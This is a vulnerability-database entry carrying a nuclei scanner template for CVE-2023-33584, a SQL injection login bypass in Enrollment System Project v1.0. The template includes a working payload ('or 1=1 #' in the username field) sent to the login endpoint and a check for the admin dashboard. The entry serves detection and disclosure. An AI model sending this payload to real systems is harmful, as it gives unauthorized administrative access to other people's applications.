Lucene search
K

Enrollment System Project v1.0 - SQL Injection Authentication Bypass

🗓️ 17 Oct 2023 07:20:28Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 129 Views

Enrollment System Project v1.0 - SQL Injection Vulnerabilit

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
Enrollment System Project v1.0 - SQL Injection Authentication Bypass Vulnerability
6 Jun 202300:00
zdt
ATTACKERKB
CVE-2023-33584
21 Jun 202313:15
attackerkb
GithubExploit
Exploit for Cross-site Scripting in Phpgurukul Student_Study_Center_Management_System
16 Feb 202508:05
githubexploit
Circl
CVE-2023-33584
4 Jun 202300:00
circl
CNNVD
Enrollment System Project SQL注入漏洞
4 Jun 202300:00
cnnvd
CVE
CVE-2023-33584
21 Jun 202300:00
cve
Cvelist
CVE-2023-33584
21 Jun 202300:00
cvelist
Exploit DB
Enrollment System Project v1.0 - SQL Injection Authentication Bypass (SQLI)
4 Jun 202300:00
exploitdb
NVD
CVE-2023-33584
21 Jun 202313:15
nvd
OSV
CVE-2023-33584
21 Jun 202313:15
osv
Rows per page
id: CVE-2023-33584

info:
  name: Enrollment System Project v1.0 - SQL Injection Authentication Bypass
  author: r3Y3r53
  severity: critical
  description: |
    Enrollment System Project V1.0, developed by Sourcecodester, has been found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability allows an attacker to manipulate the SQL queries executed by the application. The system fails to properly validate user-supplied input in the username and password fields during the login process, enabling an attacker to inject malicious SQL code. By exploiting this vulnerability, an attacker can bypass authentication and gain unauthorized access to the system.
  reference:
    - https://www.exploit-db.com/exploits/51501
    - https://nvd.nist.gov/vuln/detail/CVE-2023-33584
    - https://packetstormsecurity.com/files/cve/CVE-2023-33584
    - https://www.sourcecodester.com/php/14444/enrollment-system-project-source-code-using-phpmysql.html
    - https://github.com/akarrel/test_enrollment
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-33584
    cwe-id: CWE-89
    epss-score: 0.06893
    epss-percentile: 0.93907
    cpe: cpe:2.3:a:enrollment_system_project:enrollment_system:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: enrollment_system_project
    product: enrollment_system
  tags: cve2023,cve,packetstorm,sqli,exploitdb,unauth,enrollment,enrollment_system_project

http:
  - raw:
      - |
        POST /enrollment/ajax.php?action=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username='+or+1%3D1+%23&password={{randstr}}
      - |
        GET /enrollment/index.php?page=home HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "Administrator") && contains(body_2, "Dashboard")'
          - 'contains(content_type, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 490a0046304402206aaa84cea2c1bd95ad50ada9f31acf013411b7cc186218000d599f6a5fcb5f4c0220475a15acd3ca7129f3a4a37fa8f08f102f77fe30ab802737f61c6585f97452a8:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jun 2024 06:53Current
10High risk
Vulners AI Score10
CVSS 3.19.8
EPSS0.14242
SSVC
129